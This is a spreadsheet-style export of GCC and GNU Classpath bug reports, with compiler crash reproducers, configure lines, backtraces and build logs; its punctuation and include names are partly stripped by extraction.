System: Linux kiste 2.4.17 #7 Thu Jan 3 17:21:51 CET 2002 i686 unknown
Architecture: i686
SuSE 7.3
glibc 2.2.4 + patches
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc --enable-concept-checks
How-To-Repeat:
tl.C
#include 
#include 
#include 
#include 
using namespace std
int main()
{
  locale coutLocale()
  cout.imbue(coutLocale)
  string s
  cin &gt;&gt; s
  if (!cin) {
    cerr &lt;&lt; ERROR while reading the locale &lt;&lt; endl
    return EXIT_FAILURE
  }
locale cinLocale(s.c_str())
cin.imbue(cinLocale)
cout &lt;&lt; cout locale:  &lt;&lt; coutLocale.name() &lt;&lt; endl
cout &lt;&lt; cin locale:  &lt;&lt; cinLocale.name() &lt;&lt; endl
double value
while (cin &gt;&gt; value) {
  cout &lt;&lt; value &lt;&lt; endl
}
}
Compiling tl.C 
g++ -v -o tl tl.C -W -Wall 
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc --enable-concept-checks
Thread model: posix
gcc version 3.1 20011229 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -W -Wall -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tl.C -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -quiet -dumpbase tl.C -W -Wall -version -o /tmp/cc8e37VS.s
GNU CPP version 3.1 20011229 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20011229 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20011229 (experimental).
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
 as -V -Qy -o /tmp/ccxwlGmA.o /tmp/cc8e37VS.s
GNU assembler version 2.11.90.0.29 (i486-suse-linux) using BFD version 2.11.90.0.29
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o tl /usr/lib/crt1.o /usr/lib/crti.o /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/crtbegin.o -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1 -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../.. /tmp/ccxwlGmA.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/crtend.o /usr/lib/crtn.o</t>
  </si>
  <si>
    <t>GCC-79197</t>
  </si>
  <si>
    <t>[5 Regression] ICE in extract_insn in gcc/recog.c:2311</t>
  </si>
  <si>
    <t>$ ./xgcc -v
Configured with: ../configure --enable-languages=cc++ --prefix=/home/marxin/bin/gcc2 --disable-multilib --disable-bootstrap --target=powerpc64le-suse-linux
$ cat /tmp/dt_arith.i
unsigned a
fn1 () { a = *(double *) 0 }
$ ./xgcc -B. /tmp/dt_arith.i 
/tmp/dt_arith.i:2:1: warning: return type defaults to â€˜intâ€™ [-Wimplicit-int]
 fn1 () { a = *(double *) 0 }
 ^~~
/tmp/dt_arith.i: In function â€˜fn1â€™:
/tmp/dt_arith.i:2:1: error: unrecognizable insn:
(insn 7 6 8 2 (set (reg:DI 160)
        (unsigned_fix:DI (reg:DF 156 [ _2 ]))) /tmp/dt_arith.i:2 -1
     (nil))
/tmp/dt_arith.i:2:1: internal compiler error: in extract_insn at recog.c:2311
0xaec368 _fatal_insn(char const* rtx_def const* char const* int char const*)
	../../gcc/rtl-error.c:108
0xaec399 _fatal_insn_not_found(rtx_def const* char const* int char const*)
	../../gcc/rtl-error.c:116
0xabdcc1 extract_insn(rtx_insn*)
	../../gcc/recog.c:2311
0x88cd93 instantiate_virtual_regs_in_insn
	../../gcc/function.c:1589
0x88cd93 instantiate_virtual_regs
	../../gcc/function.c:1957
0x88cd93 execute
	../../gcc/function.c:2006</t>
  </si>
  <si>
    <t>GCC-66793</t>
  </si>
  <si>
    <t>[5 Regression] ICE at -Os and above on x86_64-linux-gnu (verify_flow_info failed)</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -Os and above on x86_64-linux-gnu in both 32-bit and 64-bit modes. 
It is a regression from 5.1.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20150707 (experimental) [trunk revision 225501] (GCC) 
$ 
$ gcc-trunk -O1 small.c
$ gcc-5.1 -Os small.c
$ 
$ gcc-trunk -Os small.c
small.c: In function â€˜mainâ€™:
small.c:18:1: error: control flow in the middle of basic block 2
 main ()
 ^
small.c:18:1: internal compiler error: verify_flow_info failed
0x6fa932 verify_flow_info()
	../../gcc-trunk/gcc/cfghooks.c:268
0xbfac91 cleanup_tree_cfg_noloop
	../../gcc-trunk/gcc/tree-cfgcleanup.c:751
0xbfac91 cleanup_tree_cfg()
	../../gcc-trunk/gcc/tree-cfgcleanup.c:800
0xaeeb84 execute_function_todo
	../../gcc-trunk/gcc/passes.c:1910
0xaef433 execute_todo
	../../gcc-trunk/gcc/passes.c:2014
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-----------------------------------
int a b c 
struct S0
{
  int f1
} *d 
void
fn1 (struct S0 p)
{
  for (p.f1 = 0 p.f1 &lt; 1 p.f1++)
    c = a  
  for ( c)
}
int
main ()
{
  struct S0 **f = 
  d = 0 
  fn1 (**f) 
  return 0
}</t>
  </si>
  <si>
    <t>GCC-70747</t>
  </si>
  <si>
    <t>[6/7 Regression] ICE on valid code on x86_64-linux-gnu: verify_gimple failed</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk on x86_64-linux-gnu in both 32-bit and 64-bit modes.  
It is a regression from 5.3.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160420 (experimental) [trunk revision 235250] (GCC) 
$ 
$ gcc-5.3 -c -w small.c
$ 
$ gcc-trunk -c -w small.c
small.c: In function â€˜fn1â€™:
small.c:3:6: error: non-trivial conversion at assignment
 void fn1 ()
      ^~~
int
_Bool
b = 0
small.c:3:6: internal compiler error: verify_gimple failed
0xba21fd verify_gimple_in_seq(gimple*)
	../../gcc-source-trunk/gcc/tree-cfg.c:4792
0x8fb77b gimplify_body(tree_node* bool)
	../../gcc-source-trunk/gcc/gimplify.c:11501
0x8fbb36 gimplify_function_tree(tree_node*)
	../../gcc-source-trunk/gcc/gimplify.c:11589
0x77a867 cgraph_node::analyze()
	../../gcc-source-trunk/gcc/cgraphunit.c:625
0x77d3d0 analyze_functions
	../../gcc-source-trunk/gcc/cgraphunit.c:1086
0x77e638 symbol_table::finalize_compilation_unit()
	../../gcc-source-trunk/gcc/cgraphunit.c:2542
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
------------------------------------------
int *a b
void fn1 ()
{
  a = __builtin_malloc (sizeof(int)*2) 
  b = 
}</t>
  </si>
  <si>
    <t>GCC-27101</t>
  </si>
  <si>
    <t>GCJ rejects valid code (for Sun's measure of valid')</t>
  </si>
  <si>
    <t>This is probably a duplicate of something that has been filed before
but my cursory search failed to turn up any similar tickets.
GCJ rejects code that both Sun and Eclipse compilers accept.
Here's the test case:
| $ cat Reluctant.java
| public class Reluctant {
|     private Reluctant internalInstance = new Reluctant()
|
|     public Reluctant() throws Exception {
|         throw new Exception(I'm not coming out)
|     }
|
|     public static void main(String[] args) {
|         try {
|             Reluctant b = new Reluctant()
|             System.out.println(Surprise!)
|         } catch (Exception ex) {
|             System.out.println(I told you so)
|         }
|     }
| }
The test comes from
http://www.javapuzzlers.com/java-puzzlers.zip
Here's what I'm using
| $ gcj -v
| Using built-in specs.
| Reading specs from /usr/lib/gcc/x86_64-redhat-linux/4.1.0/libgcj.spec
| rename spec lib to liborig
| Target: x86_64-redhat-linux
| Configured with: ../configure --prefix=/usr --mandir=/usr/share/man \
|  --infodir=/usr/share/info --enable-shared --enable-threads=posix \
|  --enable-checking=release --with-system-zlib --enable-__cxa_atexit \
|  --disable-libunwind-exceptions --enable-libgcj-multifile \
|  --enable-languages=cc++objcobj-c++javafortranada \
|  --enable-java-awt=gtk --disable-dssi \
|  --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-1.4.2.0/jre \
|  --with-cpu=generic --host=x86_64-redhat-linux
|
| Thread model: posix
| gcc version 4.1.0 20060304 (Red Hat 4.1.0-3)
Here's the compilation error the above code triggers:
| $ gcj -C Reluctant.java
| Reluctant.java: In class 'Reluctant':
| Reluctant.java: In method 'finit$()':
| Reluctant.java:2: error: Exception $-1Ã²Ã¸java.lang.ExceptionÃ²Ã¹ can't be thrown in initializer.
|     private Reluctant internalInstance = new Reluctant()
|                                                 ^
| 1 error
Here's what the Eclipse compiler has to say:
| $ ecj -v
| Eclipse Java Compiler v_585_R31x 3.1.2 release Copyright IBM Corp 2000 2006. All rights reserved.
| $ ecj Reluctant.java
| ----------
| 1. WARNING in Reluctant.java
|  (at line 2)
| 	private Reluctant internalInstance = new Reluctant()
| 	                  ^^^^^^^^^^^^^^^^
| The field Reluctant.internalInstance is never read locally
| ----------
| ----------
| 2. WARNING in Reluctant.java
|  (at line 10)
| 	Reluctant b = new Reluctant()
| 	          ^
| The local variable b is never read
| ----------
| 2 problems (2 warnings)
No errors.
Same with Sun's javac:
| $ javac -version 2&gt;&amp;1 | head -n1
| javac 1.5.0_06
| $ javac -Xlint Reluctant.java
| $ echo $?
| 0</t>
  </si>
  <si>
    <t>vnasardinov</t>
  </si>
  <si>
    <t>GCC-9528</t>
  </si>
  <si>
    <t>[3.4 regression] [New parser] ICE in validate_nonmember_using_decl with illegal using-declaration</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the new parser:
---------------------snip here-------------------
template  struct A
{
    void foo() { using T::X }
}
---------------------snip here-------------------
The error message is:
bug.cc: In member function `void A::foo()':
bug.cc:3: internal compiler error: in validate_nonmember_using_decl at 
   cp/decl2.c:4152
Please submit a full bug report [etc.]
Since we get a sensible error message with the 3.2/3.3 branch
this is a regression.
Release:
gcc 3.4-20040127
Environment:
i686-pc-linux-gnu
How-To-Repeat:
g++ -c</t>
  </si>
  <si>
    <t>GCC-30085</t>
  </si>
  <si>
    <t>switch debug mode hash containers from ext to tr1</t>
  </si>
  <si>
    <t>Currently debug mode uses ext/hash_map ext/hash_set et. al for the basis of the ebug containers. This should be switched to 
tr1/unordered_map
tr1/unordered_set
as the older SGI hash containers are deprecated.
Also maybe these containers should be moved to backward from ext?</t>
  </si>
  <si>
    <t>CLASSPATH-24299</t>
  </si>
  <si>
    <t>[Beans] STUB: java.beans.beancontext.BeanContextServicesSupport</t>
  </si>
  <si>
    <t>This class has stub methods.</t>
  </si>
  <si>
    <t>GCC-5907</t>
  </si>
  <si>
    <t>The Ada front end lacks a proper manual</t>
  </si>
  <si>
    <t>The Ada front end should come with two manuals the User Guide and the Reference manual.  Only the Reference Manual is currently in the tree but it is not built along with other GCC manuals.
The User Guide is missing completely.
Release:
3.1 20020308 (prerelease)</t>
  </si>
  <si>
    <t>GCC-23168</t>
  </si>
  <si>
    <t>[OOM] GCC 4.0.1 OOM's while compiling VBA (works with 3.4.x)</t>
  </si>
  <si>
    <t>Hi
First of all this is my first bugreport when it comes to compilers and it's not
that detailed so bear with me.
If i compile a special version of VisualBoyAdvance on my box (fixed a 64 bit
problem not really tested) using gcc 4.0.1 as supplied by gentoo i will get a
OOM on my machine see memory info.
gcc 4.0.1 seemed to hover with a resident memory size of 800 mb while 3.4.3 did
the same thing at about 342 mb. 3.4.3 seemed to peak at 600mb resident size
(checked with top so not reliable).
This happens while compiling GBA.cpp which is a rediculusly large cpp file:
100K    GBA.cpp but only 4234 lines.
Is this intended behavior or indeed a bug?
(Btw i have been trying to get the gentoo 4.1.x snapshots to compile for
further verification but they never seem to work =P)
Mem info: 
Mem:       1023420
Swap:      1642932
gcc (GCC) 4.0.1 (Gentoo 4.0.1 pie-8.7.8)
gcc (GCC) 3.4.3 20041125 (Gentoo 3.4.3-r1 ssp-3.4.3-0 pie-8.7.7)</t>
  </si>
  <si>
    <t>pomac</t>
  </si>
  <si>
    <t>GCC-46298</t>
  </si>
  <si>
    <t>constexpr ICE on ARM</t>
  </si>
  <si>
    <t>Current mainline trunk ARM build fails with this (seems a BIND_EXPR appears in an assertion expecting a CALL_EXPR):
make[4]: Entering directory `/home/cltang/nexus/build/gcc-arm-4_6/arm-nthu-linux-gnueabi/libstdc++-v3/include'
mkdir -p ./arm-nthu-linux-gnueabi/bits/stdc++.h.gch
/home/cltang/nexus/build/gcc-arm-4_6/./gcc/xgcc -shared-libgcc -B/home/cltang/nexus/build/gcc-arm-4_6/./gcc -nostdinc++ -L/home/cltang/nexus/build/gcc-arm-4_6/arm-nthu-linux-gnueabi/libstdc++-v3/src -L/home/cltang/nexus/build/gcc-arm-4_6/arm-nthu-linux-gnueabi/libstdc++-v3/src/.libs -B/home/cltang/nexus/arm-4_6/arm-nthu-linux-gnueabi/bin/ -B/home/cltang/nexus/arm-4_6/arm-nthu-linux-gnueabi/lib/ -isystem /home/cltang/nexus/arm-4_6/arm-nthu-linux-gnueabi/include -isystem /home/cltang/nexus/arm-4_6/arm-nthu-linux-gnueabi/sys-include    -x c++-header -nostdinc++ -g -O2 -D_GNU_SOURCE -I/home/cltang/nexus/build/gcc-arm-4_6/arm-nthu-linux-gnueabi/libstdc++-v3/include/arm-nthu-linux-gnueabi -I/home/cltang/nexus/build/gcc-arm-4_6/arm-nthu-linux-gnueabi/libstdc++-v3/include -I/home/cltang/nexus/trunk/libstdc++-v3/libsupc++ -O2 -g -std=gnu++0x /home/cltang/nexus/trunk/libstdc++-v3/include/precompiled/stdc++.h \
        -o arm-nthu-linux-gnueabi/bits/stdc++.h.gch/O2ggnu++0x.gch
In file included from /home/cltang/nexus/build/gcc-arm-4_6/arm-nthu-linux-gnueabi/libstdc++-v3/include/ccomplex:42:0
                 from /home/cltang/nexus/trunk/libstdc++-v3/include/precompiled/stdc++.h:53:
/home/cltang/nexus/build/gcc-arm-4_6/arm-nthu-linux-gnueabi/libstdc++-v3/include/complex: In constructor 'constexpr std::complex::complex(std::complex::_ComplexT)':
/home/cltang/nexus/build/gcc-arm-4_6/arm-nthu-linux-gnueabi/libstdc++-v3/include/complex:1044:67: internal compiler error: in build_data_member_initialization at cp/semantics.c:5475</t>
  </si>
  <si>
    <t>GCC-24661</t>
  </si>
  <si>
    <t>unable to find a register to spill in class NO_REGS on ia64</t>
  </si>
  <si>
    <t>trying to build quake3 on ia64 ... reduced test case looks like this:
$ gcc -O2 -c sym.c
sym.c: In function `vtoa':
sym.c:28: error: unable to find a register to spill in class `FR_REGS'
sym.c:28: error: this is the insn:
(insn 12 3 13 0 (set (reg:DF 134 f6 [343])
        (float_truncate:DF (subreg:XF (reg/v:TI 112 in0 [orig:340 v ] [340]) 0))) 39 {truncxfdf2} (insn_list 3 (nil))
    (expr_list:REG_DEAD (reg/v:TI 112 in0 [orig:340 v ] [340])
        (nil)))
sym.c:28: confused by earlier errors bailing out
tested Gentoo 3.3.2 / 3.3.6 / 3.4.4 / 4.0.2 all fail same way</t>
  </si>
  <si>
    <t>GCC-71166</t>
  </si>
  <si>
    <t>[7 Regression] ICE with nested constexpr/initializer</t>
  </si>
  <si>
    <t>Created attachment 38508
A source file which reproduces the problem
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/6/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 6.1.1-3' --with-bugurl=file:///usr/share/doc/gcc-6/README.Bugs --enable-languages=cadac++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-6 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-6-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-6-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-6-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 6.1.1 20160511 (Debian 6.1.1-3) 
Compile the attached source with g++ -c foo.cxx:
/tmp/foo.cxx: In constructor 'constexpr BarContainer::BarContainer()':
/tmp/foo.cxx:8:8:   in constexpr expansion of 'Bar()'
/tmp/foo.cxx:5:22:   in constexpr expansion of 'MakeFoo()'
/tmp/foo.cxx:8:8: internal compiler error: in cxx_eval_call_expression at cp/constexpr.c:1449
 struct BarContainer {
        ^~~~~~~~~~~~
0x6f9649 cxx_eval_call_expression
        ../../src/gcc/cp/constexpr.c:1449
0x6fab6f cxx_eval_constant_expression
        ../../src/gcc/cp/constexpr.c:3556
0x6fae5d cxx_eval_constant_expression
        ../../src/gcc/cp/constexpr.c:3616
0x6fc651 cxx_eval_store_expression
        ../../src/gcc/cp/constexpr.c:3123
0x6fa39c cxx_eval_constant_expression
        ../../src/gcc/cp/constexpr.c:3633
0x6f9f08 cxx_eval_constant_expression
        ../../src/gcc/cp/constexpr.c:3901
0x6fa185 cxx_eval_constant_expression
        ../../src/gcc/cp/constexpr.c:3672
0x6fa185 cxx_eval_constant_expression
        ../../src/gcc/cp/constexpr.c:3672
0x6fab90 cxx_eval_constant_expression
        ../../src/gcc/cp/constexpr.c:4014
0x6f92d2 cxx_eval_call_expression
        ../../src/gcc/cp/constexpr.c:1494
0x6fab6f cxx_eval_constant_expression
        ../../src/gcc/cp/constexpr.c:3556
0x6fd1f6 cxx_eval_outermost_constant_expr
        ../../src/gcc/cp/constexpr.c:4121
0x6fec81 maybe_constant_init(tree_node* tree_node*)
        ../../src/gcc/cp/constexpr.c:4439
0x69b07e build_vec_init(tree_node* tree_node* tree_node* bool int int)
        ../../src/gcc/cp/init.c:4176
0x6eb43d cp_gimplify_expr(tree_node** gimple** gimple**)
        ../../src/gcc/cp/cp-gimplify.c:591
0x8d62b5 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        ../../src/gcc/gimplify.c:10196
0x8d9cb6 gimplify_stmt(tree_node** gimple**)
        ../../src/gcc/gimplify.c:5688
0x8d6aa8 gimplify_cleanup_point_expr
        ../../src/gcc/gimplify.c:5464
0x8d6aa8 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        ../../src/gcc/gimplify.c:10652
0x8d9cb6 gimplify_stmt(tree_node** gimple**)
        ../../src/gcc/gimplify.c:5688</t>
  </si>
  <si>
    <t>GCC-30678</t>
  </si>
  <si>
    <t>[4.3 regression] sysmacros.h get currupt from Fixincludes with updated glibc.</t>
  </si>
  <si>
    <t>Hi all 
Frank Bruce I added you both to the cc line as you where the last to touch what appears to me to be a fix up problem where one isn't needed.  This also may occur farther down in the bootstrap but atm is in stage1.
Notes:
glibc is 20070111 with the patch set to make it C99 compliant with the new compiler std of handing inline's.
Here is a snippet of sysmacros.h from glibc now followed by what the compiler chocked on during stage one bootstrap.  Separated by equals.  Also I included below that some text showing the compile break.
You will notice I hope the dangling for munged test where only thing left are two __ underscores on a line which list I checked isn't valid C/C++ )
Thank you
Ron
========================================
#ifndef _SYS_SYSMACROS_H
#define _SYS_SYSMACROS_H	1
#include 
/* If the compiler does not know long long it is out of luck.  We are
   not going to hack weird hacks to support the dev_t representation
   they need.  */
#ifdef __GLIBC_HAVE_LONG_LONG
__extension__
__extern_inline unsigned int gnu_dev_major (unsigned long long int __dev)
     __THROW
__extension__
__extern_inline unsigned int gnu_dev_minor (unsigned long long int __dev)
     __THROW
__extension__
__extern_inline unsigned long long int gnu_dev_makedev (unsigned int __major
							unsigned int __minor)
     __THROW
# if defined __GNUC__ &amp;&amp; __GNUC__ &gt;= 2
__extension__ __extern_inline unsigned int
__NTH (gnu_dev_major (unsigned long long int __dev))
{
  return ((__dev &gt;&gt; 8) 
}
__extension__ __extern_inline unsigned int
__NTH (gnu_dev_minor (unsigned long long int __dev))
{
  return (__dev 
}
__extension__ __extern_inline unsigned long long int
__NTH (gnu_dev_makedev (unsigned int __major unsigned int __minor))
{
  return ((__minor &amp; 0xff) | ((__major &amp; 0xfff) &lt;&lt; 8)
	  | (((unsigned long long int) (__minor &amp; ~0xff)) &lt;&lt; 12)
	  | (((unsigned long long int) (__major 
}
# endif
=======================================================
#ifndef _SYS_SYSMACROS_H
#define _SYS_SYSMACROS_H	1
#include 
/* If the compiler does not know long long it is out of luck.  We are
   not going to hack weird hacks to support the dev_t representation
   they need.  */
#ifdef __GLIBC_HAVE_LONG_LONG
__extension__
__
#if __STDC_VERSION__ &lt; 19901L
extern
#endif
_inline unsigned int gnu_dev_major (unsigned long long int __dev)
     __THROW
__extension__
__
#if __STDC_VERSION__ &lt; 19901L
extern
#endif
_inline unsigned int gnu_dev_minor (unsigned long long int __dev)
     __THROW
__extension__
__
#if __STDC_VERSION__ &lt; 19901L
extern
#endif
_inline unsigned long long int gnu_dev_makedev (unsigned int __major
							unsigned int __minor)
     __THROW
# if defined __GNUC__ &amp;&amp; __GNUC__ &gt;= 2
__extension__ __
#if __STDC_VERSION__ &lt; 19901L
extern
#endif
_inline unsigned int
__NTH (gnu_dev_major (unsigned long long int __dev))
{
  return ((__dev &gt;&gt; 8) 
}
__extension__ __
#if __STDC_VERSION__ &lt; 19901L
extern
#endif
_inline unsigned int
__NTH (gnu_dev_minor (unsigned long long int __dev))
{
  return (__dev 
}
__extension__ __
#if __STDC_VERSION__ &lt; 19901L
extern
#endif
_inline unsigned long long int
__NTH (gnu_dev_makedev (unsigned int __major unsigned int __minor))
{
  return ((__minor &amp; 0xff) | ((__major &amp; 0xfff) &lt;&lt; 8)
	  | (((unsigned long long int) (__minor &amp; ~0xff)) &lt;&lt; 12)
	  | (((unsigned long long int) (__major 
}
# endif
================================================================
var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/xgcc -B/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/ -B/usr/x86_64-pc-linux-gnu/bin/ -B/usr/x86_64-pc-linux-gnu/lib/ -isystem /usr/x86_64-pc-linux-gnu/include -isystem /usr/x86_64-pc-linux-gnu/sys-include -O -O2  -O2 -pipe -fomit-frame-pointer -O2 -march=core2 -mtune=core2 -mssse3  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/var/tmp/portage/sys-devel/gcc-4.3.98/work/gcc-4.3.98/libgcc -I/var/tmp/portage/sys-devel/gcc-4.3.98/work/gcc-4.3.98/libgcc/. -I/var/tmp/portage/sys-devel/gcc-4.3.98/work/gcc-4.3.98/libgcc/../gcc -I/var/tmp/portage/sys-devel/gcc-4.3.98/work/gcc-4.3.98/libgcc/../include -I/var/tmp/portage/sys-devel/gcc-4.3.98/work/gcc-4.3.98/libgcc/../libdecnumber -I../../libdecnumber -o _clear_cache.o -MT _clear_cache.o -MD -MP -MF _clear_cache.dep -DL_clear_cache -c /var/tmp/portage/sys-devel/gcc-4.3.98/work/gcc-4.3.98/libgcc/../gcc/libgcc2.c \
          -fvisibility=hidden -DHIDE_EXPORTS
In file included from /usr/include/sys/sysmacros.h:8
                 from /usr/include/gentoo-multilib/amd64/sys/types.h:223
                 from /usr/include/sys/types.h:8
                 from /var/tmp/portage/sys-devel/gcc-4.3.98/work/gcc-4.3.98/libgcc/../gcc/tsystem.h:93
                 from /var/tmp/portage/sys-devel/gcc-4.3.98/work/gcc-4.3.98/libgcc/../gcc/libgcc2.c:33:
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:42: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:49: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:56: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:65: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:75: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:85: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
In file included from /usr/include/sys/sysmacros.h:8
                 from /usr/include/gentoo-multilib/amd64/sys/types.h:223
                 from /usr/include/sys/types.h:8
                 from /var/tmp/portage/sys-devel/gcc-4.3.98/work/gcc-4.3.98/libgcc/../gcc/tsystem.h:93
                 from /var/tmp/portage/sys-devel/gcc-4.3.98/work/gcc-4.3.98/libgcc/../gcc/libgcc2.c:33:
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:42: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:49: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:56: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:65: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:75: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:85: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
In file included from /usr/include/sys/sysmacros.h:8
                 from /usr/include/gentoo-multilib/amd64/sys/types.h:223
                 from /usr/include/sys/types.h:8
                 from /var/tmp/portage/sys-devel/gcc-4.3.98/work/gcc-4.3.98/libgcc/../gcc/tsystem.h:93
                 from /var/tmp/portage/sys-devel/gcc-4.3.98/work/gcc-4.3.98/libgcc/../gcc/libgcc2.c:33:
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:42: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:49: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:56: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:65: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
